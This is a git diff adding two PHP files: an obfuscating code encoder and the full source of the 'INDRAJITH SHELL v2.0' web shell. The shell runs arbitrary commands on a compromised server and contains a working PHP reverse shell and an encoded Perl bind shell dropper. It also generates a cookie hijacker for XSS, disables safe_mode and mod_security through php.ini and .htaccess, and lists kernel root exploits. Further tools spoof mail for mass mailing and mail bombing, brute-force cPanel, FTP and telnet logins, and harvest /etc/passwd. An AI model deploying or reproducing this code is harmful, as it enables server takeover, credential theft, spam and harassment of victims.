diff --git a/php/carbylamine.txt b/php/carbylamine.txt new file mode 100644 index 0000000..0a3f4df --- /dev/null +++ b/php/carbylamine.txt @@ -0,0 +1,103 @@ +=5;$i++) + { + $in[$i]=' '; + } + return $in; + } + else + { + return $in; + } +} +function makeoutfile($str) +{ $funcname=rstr(); +$varname='$'.rstr(); +$template= +""; + return $template; +} +function main($argc,$argv) +{ +$banner= +"\n +-------------------------------------------------------------------+ + |+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++| + |+ +| + +____ _ _ _ +| +/ __ \ | | | | (_) +| +| / \/ __ _ _ __ | |__ _ _ | | __ _ _ __ ___ _ _ __ _+|_ +| | / _` || '__|| '_ \ | | | || | / _` || '_ ` _ \ | || '_ \ / _ \ +| \__/\| (_| || | | |_) || |_| || || (_| || | | | | || || | | || __/ + \____/ \__,_||_| |_.__/ \__, ||_| \__,_||_| |_| |_||_||_| |_| \___| + |+ __/ | +| + |+ Carbylamine PHP Encoder +| + |+ v0.1.1 Nightly +| + |+ +| + |+ +| + |+ Coded by Prakhar Prasad +| + |+ (prakharpd@gmail.com) +| + |+ +| + |+ +| + |+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++| + +-------------------------------------------------------------------+\n\n"; +$usage="$banner Syntax: ".$_SERVER['PHP_SELF']." \n"; +if($argc==1) {echo $usage ; die();} +if($argc>1) $file = $argv[1]; +if($argc>2) $outfile = $argv[2]; +if(empty($file) || empty($outfile)) { echo "Input/Output filename not entered!\n\n\x07" ;die();} +if(!file_exists($file)) +{ +echo "$banner Error: Input file doesn't exist\n\n\x07"; +} +else{ +$orginal_size=round(filesize($file)/1024,2); +echo "$banner Encoding : $file ($orginal_size KB) \n\n "; +$output_filename=$outfile; +$outfile=fopen($outfile,'w+'); +$file=fread(fopen($file,'r'),filesize($file)); +$outdata=makeoutfile(striptag($file)); +$newsize=round(strlen($outdata)/1024,2); +echo " Compression : ".@round(100-(($newsize*100)/($orginal_size!=0?$orginal_size:1)),2)."%\n\n"; +if(!fwrite($outfile,$outdata)) +{ + echo " Unable to write to $output_filename\n\n\x07"; +} +else +{ +echo " Successfully Encoded! to $output_filename\n\n" ; +}}} +main($argc,$argv); +?> diff --git a/php/indrajith-2.0.txt b/php/indrajith-2.0.txt new file mode 100644 index 0000000..62a2e16 --- /dev/null +++ b/php/indrajith-2.0.txt @@ -0,0 +1,2347 @@ +"; //For Ensuring... Fuck all Robots... +/*------------------ End of Anti Crawler -----*/ + + + + echo ""; + echo ""; + if($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password)) + { + if($_POST["usrname"]==$username && $_POST["passwrd"]==$password) + { + print''; + if($email!="") + { + mail_alert(); + } + } + else + { + if($_POST['usrname']) + { + print''; + } + echo 'INDRAJITH SHELL v.2.0
+

+ >>>>>>>>>>>>>>><<<<<>>>>>>>>>> +

+
+
INDRAJITH SHELL v.2.0
+
+ + +
+ + +
Login:
Password:
 
+
'; + exit; + } + } + +$color_g="green"; +$color_b="4C83AF"; +$color_bg="#111111"; +$color_hr="#222"; +$color_wri="green"; +$color_rea="yellow"; +$color_non="red"; +$path=$_GET['path']; + +@session_start(); +@set_time_limit(0); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); +@ignore_user_abort(FALSE); +@ini_set('zlib.output_compression','Off'); + +$sep="/"; +if(strtolower(substr(PHP_OS,0,3))=="win") +{ + $os="win"; + $sep="\\"; + $ox="Windows"; +} +else +{ + $os="nix"; + $ox="Linux"; +} + + + +$self=$_SERVER['PHP_SELF']; +$srvr_sof=$_SERVER['SERVER_SOFTWARE']; +$your_ip=$_SERVER['REMOTE_ADDR']; +$srvr_ip=$_SERVER['SERVER_ADDR']; +$admin=$_SERVER['SERVER_ADMIN']; + +$s_php_ini="safe_mode=OFF +disable_functions=NONE"; + +$ini_php=""; + +$s_htaccess=" +Sec------Engine Off +Sec------ScanPOST Off +"; + +$s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI +AddType application/x-httpd-cgi .sh +AddHandler cgi-script .pl +AddHandler cgi-script .pl"; + +$sym_htaccess="Options all +DirectoryIndex Sux.html +AddType text/plain .php +AddHandler server-parsed .php +AddType text/plain .html +AddHandler txt .html +Require None +Satisfy Any"; + +$sym_php_ini="safe_mode=OFF +disable_functions=NONE"; + +$forbid_dir="Options -Indexes"; + +$cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18="; +$bind_perl="rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP"; + +/*----------------------- Top Menu ------------------------------------------*/ + +if($safemode=="On") +{ + echo ""; +} +else +{ + echo ""; +} + +echo ""; + +echo "INDRAJITH SHELL v.2.0
+ + + + + + + +
+
+

INDRAJITH

MINI SHELL +
+ 		+
OS : + ".$ox." | ".php_uname()."
+ Your IP : ".$your_ip." | Server IP : ".$srvr_ip." | Admin : {$admin}
+ MySQL : "; echo mysqlx(); + echo " | Oracle : "; echo oraclesx(); + echo " | MSSQL : "; echo mssqlx(); + echo " | PostGreySQL : ";echo postgreyx(); + echo "
cURL : ";echo curlx(); + echo " | Total Space : "; echo disc_size(); + echo " | Free Space : "; echo freesize(); + echo "
Software : {$srvr_sof} | PHP : ".phpversion()." +
Disabled Functions : ";echo disabled_functns()."
"; + if($os == 'win'){ echo "Drives : ";echo drivesx(); } + else { echo "r00t Exploit : "; echo r00t_exploit() .""; } + echo " +
+
"; +echo "
"; +/*----------------------- End of Top Menu -----------------------------------*/ + + +/*--------------- FUNCTIONS ----------------*/ +function alert($alert_txt) +{ + echo ""; +} + +function disabled_functns() +{ + if(!@ini_get('disable_functions')) + { + echo "None"; + } + else + { + echo @ini_get('disable_functions'); + } +} + + +function drivesx() +{ + foreach(range('A','Z') as $drive) + { + if(is_dir($drive.':\\')) + { + echo "[".$drive."]"; + } + } +} + +function mail_alert() +{ + global $email, $your_ip; + $shell_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; + $content_mail="Hello Master,\n +Your shell in $shell_path is accessed by ".$_SERVER['REMOTE_ADDR'] .". Hope You Enjoy this shell very much.\n +By Indrajith"; + mail($email, "Shell Accessed!!!", $content_mail ,"From:indrajith@shell.com"); +} + +function filesizex($size) +{ + if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; + elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; + elseif ($size>=1024)$size = round(($size/1024),2)." KB"; + else $size .= " B"; + return $size; +} + +function disc_size() +{ + echo filesizex(disk_total_space("/")); +} + +function freesize() +{ + echo filesizex(disk_free_space("/")); +} + +function file_perm($filz){ + if($m=fileperms($filz)){ + $p=''; + $p .= ($m & 00400) ? 'r' : '-'; + $p .= ($m & 00200) ? 'w' : '-'; + $p .= ($m & 00100) ? 'x' : '-'; + $p .= ($m & 00040) ? 'r' : '-'; + $p .= ($m & 00020) ? 'w' : '-'; + $p .= ($m & 00010) ? 'x' : '-'; + $p .= ($m & 00004) ? 'r' : '-'; + $p .= ($m & 00002) ? 'w' : '-'; + $p .= ($m & 00001) ? 'x' : '-'; + return $p; + } + else return "?????"; +} + + +function mysqlx() +{ + if(function_exists('mysql_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function oraclesx() +{ + if(function_exists('oci_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function mssqlx() +{ + if(function_exists('mssql_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function postgreyx() +{ + if(function_exists('pg_connect')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function strip($filx) +{ + if(!get_magic_quotes_gpc()) return trim(urldecode($filx)); + return trim(urldecode(stripslashes($filx))); +} + +function curlx() +{ + if(function_exists('curl_version')) + { + echo "Enabled"; + } + else + { + echo "Disabled"; + } +} + +function filesize_x($filex) +{ + $f_size=filesizex(filesize($filex)); + return $f_size; +} + +function rename_ui() +{ + $rf_path=$_GET['rename']; + echo "

Rename



New Name :





"; +} + +function filemanager_bg() +{ + global $sep, $self; + $path=!empty($_GET['path'])?$_GET['path']:getcwd(); + $dirs=array(); + $fils=array(); + if(is_dir($path)) + { + chdir($path); + if($handle=opendir($path)) + { + while(($item=readdir($handle))!==FALSE) + { + if($item=="."){continue;} + if($item==".."){continue;} + if(is_dir($item)) + { + array_push($dirs, $path.$sep.$item); + } + else + { + array_push($fils, $path.$sep.$item); + } + } + } + else + { + alert("Access Denied for this operation"); + } + } + else + { + alert("Directory Not Found!!!"); + } + echo "
+ + + + + + "; + foreach($dirs as $dir) + { + echo " + + + "; + } + foreach($fils as $fil) + { + echo " + + + "; + } + echo "
NameSizePermissionsActions
".basename($dir)."".filesize_x($dir)."".file_perm($dir)."Delete | Rename
".basename($fil)."".filesize_x($fil)."".file_perm($fil)."Delete | Rename | Edit | Copy
"; +} + +function rename_bg() +{ + if(isset($_GET['old_name']) && isset($_GET['new_name'])) + { + $o_r_path=basename($_GET['old_name']); + $r_path=str_replace($o_r_path, "", $_GET['old_name']); + $r_new_name=$r_path.$_GET['new_name']; + echo $r_new_name; + if(rename($_GET['old_name'], $r_new_name)==FALSE) + { + alert("Access Denied for this action!!!"); + } + else + { + alert("Renamed File Succeessfully"); + } + } +} + +function edit_file() +{ + $path=$_GET['path']; + chdir($path); + $edt_file=$_GET['edit']; + $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file))); + if($e_content) + { + $o_content=$e_content; + } + else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) + { + $fd = fopen($edt_file, "rb"); + if(!$fd) + { + alert("Permission Denied"); + } + else + { + while(!feof($fd)) + { + $o_content=wordwrap(htmlspecialchars(fgets($fd))); + } + } + fclose($fd); + } + echo "

Edit File


View File : ". basename($_GET['edit']) ."


+
+



"; +} +function edit_file_bg() +{ + if(file_exists($_POST['e_file'])) + { + $handle = fopen($_POST['e_file'],"w+"); + if (!handle) + { + alert("Permission Denied"); + } + else + { + fwrite($handle,$_POST['e_content_n']); + alert("Your changes were Successfully Saved!"); + } + fclose($handle); + } + else + { + alert("File Not Found!!!"); + } +} +function delete_file() +{ + $del_file=$_GET['del_fil']; + if(unlink($del_file) != FALSE) + { + alert("Deleted Successfully"); + exit; + } + else + { + alert("Access Denied for this Operation"); + exit; + } +} +function deldirs($d_dir) +{ + $d_files= glob($d_dir.'*', GLOB_MARK); + foreach($d_files as $d_file) + { + if(is_dir($d_file)) + { + deldirs($d_file); + } + else + { + unlink($d_file); + } + } + if(is_dir($d_dir)) + { + if(rmdir($d_dir)) + { + alert("Deleted Directory Successfully"); + } + else + { + alert("Access Denied for this Operation"); + } + } +} + +function code_viewer() +{ + $path=$_GET['path']; + $r_file=$_GET['read']; + $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file))); + if($r_content) + { + $rr_content=$r_content; + } + else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) + { + $fd = fopen($r_file, "rb"); + if (!$fd) + { + alert("Permission Denied"); + } + else + { + while(!feof($fd)) + { + $rr_content=wordwrap(htmlspecialchars(fgets($fd))); + } + } + fclose($fd); + } + echo "

View File


Edit File : ". basename($_GET['read']) ."

".$rr_content."




"; +} +function copy_file_ui() +{ + echo "

Copy File



Copy : To : Name :





"; +} +function copy_file_bg() +{ + global $sep; + if(function_exists(copy)) + { + if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name'])) + { + alert("Succeded"); + } + else + { + alert("Access Denied"); + } + } +} +function ch_perm_bg() +{ + if(isset($_GET['p_filex']) && isset($_GET['new_perm'])) + { + if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE) + { + alert("Succeded. Permission Changed!!!"); + } + else + { + alert("Access Denied for This Operation"); + } + } +} +function ch_perm_ui() +{ + $p_file=$_GET['perm']; + echo "

New Permission

New Permission :

Full Access : 755
Notice : Don't use Unix Access like 777, 666, etc. Use 755, 655, etc





"; + ch_perm_bg(); +} +function mk_file_ui() +{ + chdir($_GET['path']); + echo "


+ + New File Name :


+
+
"; +} +function mk_file_bg() +{ + chdir($_GET['path']); + $c_path=$_GET['path']; + $c_file=$_GET['new_f_name']; + $c_file_contents=$_GET['n_file_content']; + $handle=fopen($c_file, "w"); + if(!$handle) + { + alert("Permission Denied"); + } + else + { + fwrite($handle,$c_file_contents); + alert("Your changes were Successfully Saved!"); + } + fclose($handle); +} +function create_dir() +{ + chdir($_GET['path']); + $new_dir=$_GET['new_dir']; + if(is_writable($_GET['path'])) + { + mkdir($new_dir); + alert("Direcory Created Successfully"); + exit; + } + else + { + alert("Access Denied for this Operation"); + exit; + } +} +function cmd($cmd) +{ + chdir($_GET['path']); + $res=""; + if($_GET['cmdexe']) + { + $cmd=$_GET['cmdexe']; + } + if(function_exists('shell_exec')) + { + $res=shell_exec($cmd); + } + else if(function_exists('exec')) + { + exec($cmd,$res); + $res=join("\n",$res); + } + else if(function_exists('system')) + { + ob_start(); + system($cmd); + $res = ob_get_contents(); + ob_end_clean(); + } + elseif(function_exists('passthru')) + { + ob_start(); + passthru($cmd); + $res=ob_get_contents(); + ob_end_clean(); + } + else if(function_exists('proc_open')) + { + $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); + $handle = proc_open($cmd ,$descriptorspec , $pipes); + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $res .= fread($pipes[1], 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $res .= fgets($pipes[1],512); + } + } + } + pclose($handle); + } + + else if(function_exists('popen')) + { + $handle = popen($cmd , "r"); + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($handle)) + { + $res .= fread($handle, 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($handle)) + { + $res .= fgets($handle,512); + } + } + } + pclose($handle); + } + + $res=wordwrap(htmlspecialchars($res)); + if($_GET['cmdexe']) + { + echo "

r00t@TOF:~#

".$res."
"; + } + return $res; +} +function upload_file() +{ + chdir($_POST['path']); + if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name'])) + { + alert("Uploaded File Successfully"); + } + else + { + alert("Access Denied!!!"); + } +} + +function reverse_conn_ui() +{ + global $your_ip; + echo "
+

Reverse Shell

+

+ + + + +
Your IP : + PORT : +
PHP Reverse Shell : nc -l -p port
PERL Bind Shell : nc server_ip port
"; +} +function reverse_conn_bg() +{ + global $os; + $option=$_REQUEST['rev_option']; + $ip=$_GET['my_ip']; + $port=$_GET['my_port']; + if($option=="PHP Reverse Shell") + { + echo "

RESULT


"; + function printit ($string) + { + if (!$daemon) + { + print "$string\n"; + } + } + $chunk_size = 1400; + $write_a = null; + $error_a = null; + $shell = 'uname -a; w; id; /bin/sh -i'; + $daemon = 0; + $debug = 0; + if (function_exists('pcntl_fork')) + { + $pid = pcntl_fork(); + if ($pid == -1) + { + printit("ERROR: Can't fork"); + exit(1); + } + if ($pid) + { + exit(0); + } + if (posix_setsid() == -1) + { + printit("Error: Can't setsid()"); + exit(1); + } + $daemon = 1; + } + else + { + printit("WARNING: Failed to daemonise. This is quite common and not fatal."); + } + chdir("/"); + umask(0); + $sock = fsockopen($ip, $port, $errno, $errstr, 30); + if (!$sock) + { + printit("$errstr ($errno)"); + exit(1); + } + $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); + $process = proc_open($shell, $descriptorspec, $pipes); + if (!is_resource($process)) + { + printit("ERROR: Can't spawn shell"); + exit(1); + } + stream_set_blocking($pipes[0], 0); + stream_set_blocking($pipes[1], 0); + stream_set_blocking($pipes[2], 0); + stream_set_blocking($sock, 0); + printit("Successfully opened reverse shell to $ip:$port "); + while (1) + { + if (feof($sock)) + { + printit("ERROR: Shell connection terminated"); + break; + } + if (feof($pipes[1])) + { + printit("ERROR: Shell process terminated"); + break; + } + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + if (in_array($sock, $read_a)) + { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + if (in_array($pipes[1], $read_a)) + { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + if (in_array($pipes[2], $read_a)) + { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } + } + fclose($sock); + fclose($pipes[0]); + fclose($pipes[1]); + fclose($pipes[2]); + proc_close($process); + echo "



"; + } + else if($option=="PERL Bind Shell") + { + global $bind_perl, $os; + $pbfl=$bind_perl; + $handlr=fopen("indrajith_perl_bind.pl", "wb"); + if($handlr) + { + fwrite($handlr, gzinflate(base64_decode($bind_perl))); + } + else + { + alert("Access Denied for create new file"); + } + fclose($handlr); + if(file_exists("indrajith_perl_bind.pl")) + { + if($os=="nix") + { + cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl $port"); + } + else + { + cmd("perl indrajith_perl_bind.pl $port"); + } + } + } +} + +function cookie_jack() +{ + global $cookie_highjacker; + echo "

NOTICE

"; + if(function_exists('fopen') && function_exists('fwrite')) + { + $cook=gzinflate(base64_decode($cookie_highjacker)); + $han_le=fopen("jith_cookie.php", "w+"); + if($han_le) + { + fwrite($han_le, $cook); + echo "Yes... Cookie highjacker is generated.
Name : jith_cookie.php.
Rename it as 404.php or what you like and highjack cookie of your target.
It is usefull in XSS
It will make a file configuration.txt in this direcory and save the cookie value in it. :p cheers...



"; + } + else + { + echo "Sorry... Generate COOKIE HIGHJACKER failed



"; + } + } +} + + + +function safe_mode_fuck() +{ + global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php; + $path = chdir($_GET['path']); + chdir($_GET['path']); + switch($_GET['safe_mode']) + { + case "s_php_ini": + $s_file=$s_php_ini; + $s_name="php.ini"; + break; + case "s_htaccess": + $s_name=".htaccess"; + $s_file=$s_htaccess; + break; + case "s_htaccess_pl": + $s_name=".htaccess"; + $s_file=$s_htaccess_pl; + break; + case "s_ini_php": + $s_name="ini.php"; + $s_file=$ini_php; + break; + + } + if(function_exists('fopen')&& function_exists('fwrite')) + { + $s_handle=fopen("$s_name", "w+"); + if($s_handle) + { + fwrite($s_handle, $s_file); + alert("Operation Succeed!!!"); + } + else + { + alert("Access Denied!!!"); + } + fclose($s_handle); + } +} +function safe_mode_fuck_ui() +{ + global $path; + $path=getcwd(); + echo ""; +} + + +function AccessDenied() +{ + global $path, $forbid_dir; + $path=$_GET['path']; + chdir($path); + if(function_exists('fopen') && function_exists('fwrite')) + { + $forbid=fopen(".htaccess", "wb"); + if($forbid) + { + fwrite($forbid, $forbid_dir); + alert("Opreation Succeeded"); + } + else + { + alert("Access Denied"); + } + fclose($forbid); + } +} + +function r00t_exploit() +{ + $kernel = php_uname(); + $r00t_db = array('2.6.19'=>'jessica','2.6.20'=>'jessica','2.6.21'=>'jessica','2.6.22'=>'jessica','2.6.23'=>'jessica, vmsplice','2.6.24'=>'jessica, vmspice','2.6.31'=>'enlightment','2.6.18'=>'brk, ptrace, kmod, brk2','2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip,ptrace'); + foreach($r00t_db as $kern=>$exp) + { + if(strstr($kernel, $kern)) + { + return $exp; + } + else + { + $exp='Not found.'; + return $exp; + } + } +} + +function php_ende_ui() +{ + echo "

PHP ENCODE/DECODE

+ +
+ Method : TYPE :



"; +} +function php_ende_bg() +{ + $meth_d=$_POST['typed']; + $typ_d=$_POST['typenc']; + $c_ntent=$_POST['php_content']; + $c_ntent=$c_ntent; + switch($meth_d) + { + case "Encode": + switch($typ_d) + { + case "GZINFLATE": + $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),''),9)); + $res_t=""; + break; + case "GZUNCOMPRESS": + $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),''),9)); + $res_t=""; + break; + case "STR_ROT13": + $res_t=trim(stripslashes($c_ntent.' '),''); + $res_t=base64_encode(str_rot13($res_t)); + $res_t=""; + break; + } + break; + case "Decode": + switch($typ_d) + { + case "GZINFLATE": + $res_t=gzinflate(base64_decode($c_ntent)); + break; + case "GZUNCOMPRESS": + $res_t=gzuncompress(base64_decode($c_ntent)); + break; + case "STR_ROT13": + $res_t=str_rot13(base64_decode($c_ntent)); + break; + } + break; + } + echo "

INDRAJITH SHELL

"; +} + +function massmailer_ui() +{ + echo "

MASS MAILER & MAIL BOMBER

+
Mass Mail
FROM :
TO :
Subject :
Mail Bomber
TO :
Subject :
No. of times
"; +} + +function massmailer_bg() +{ + $from=$_POST['from']; + $to=$_POST['to_mail']; + $subject=$_POST['subject_mail']; + $message=$_POST['mail_content']; + if(function_exists('mail')) + { + if(mail($to,$subject,$message,"From:$from")) + { + echo "

MAIL BOMBING



Successfully Mails Send... :p



"; + } + else + { + echo "

MAIL BOMBING



Sorry, failed to Mails Sending... :(



"; + } + } + else + { + echo "

MAIL BOMBING



Sorry, failed to Mails Sending... :(



"; + } +} + +function mailbomb_bg() +{ + $rand=rand(0, 9999999); + $to=$_POST['bomb_to']; + $from="president_$rand@whitewhitehouse.gov"; + $subject=$_POST['bomb_subject']." ID ".$rand; + $times=$_POST['bomb_no']; + $content=$_POST['bmail_content']; + if($times=='') + { + $times=1000; + } + while($times--) + { + if(function_exists('mail')) + { + if(mail($to,$subject,$message,"From:$from")) + { + echo "

MAIL BOMBING



Successfully Mails Bombed... :p



"; + } + else + { + echo "

MAIL BOMBING



Sorry, failed to Mails Bombing... :(



"; + } + } + else + { + echo "

MAIL BOMBING



Sorry, failed to Mails Bombing... :(



"; + } + } +} + + +/* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/ +/*------------------------ Credit Goes to Them ---------------------------------*/ +function cpanel_check($host,$user,$pass,$timeout) +{ + set_time_limit(0); + global $cpanel_port; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { + print "Error : Connection Timeout. Please Check The Target Hostname ."; + exit; + } + else if (curl_errno($ch) == 0 ) + { + print "[~] + Cracking Success With Username "$user\" and Password \"$pass\"

"; + } + curl_close($ch); +} + +function cpanel_crack() +{ + set_time_limit(0); + global $os; + echo "
"; + $cpanel_port="2082"; + $connect_timeout=5; + if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) + { + ?> +
+
+ + + + + + + + + + + + + + + + + + + +
Target :
User namesPassword
Guess options :
Timeout delay :
+
+
+ Please Enter The Users or Password List
"; + else + { + $userlist=explode("\n",$_POST['username']); + $passlist=explode("\n",$_POST['password']); + + if($_POST['cracktype'] == "ftp") + { + foreach ($userlist as $user) + { + $pureuser = trim($user); + foreach ($passlist as $password ) + { + $purepass = trim($password); + ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + } + } + } + if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") + { + if($cracktype == "telnet") + { + $cpanel_port="23"; + } + else + $cpanel_port="2082"; + foreach ($userlist as $user) + { + $pureuser = trim($user); + echo " [ - ] + Processing user $pureuser ...

"; + foreach ($passlist as $password ) + { + $purepass = trim($password); + cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + } + } + } + } + } + + echo "
"; +} + +function get_users() +{ + $userz = array(); + $user = file("/etc/passwd"); + foreach($user as $userx=>$usersz) + { + $userct = explode(":",$usersz); + array_push($userz,$userct[0]); + } + if(!$user) + { + if($opd = opendir("/home/")) + { + while(($file = readdir($opd))!== false) + { + array_push($userz,$file); + } + } + closedir($opd); + } + $userz=implode(', ',$userz); + return $userz; +} + +function exploit_details() +{ + global $os; + echo "
+

Exploit Server Details



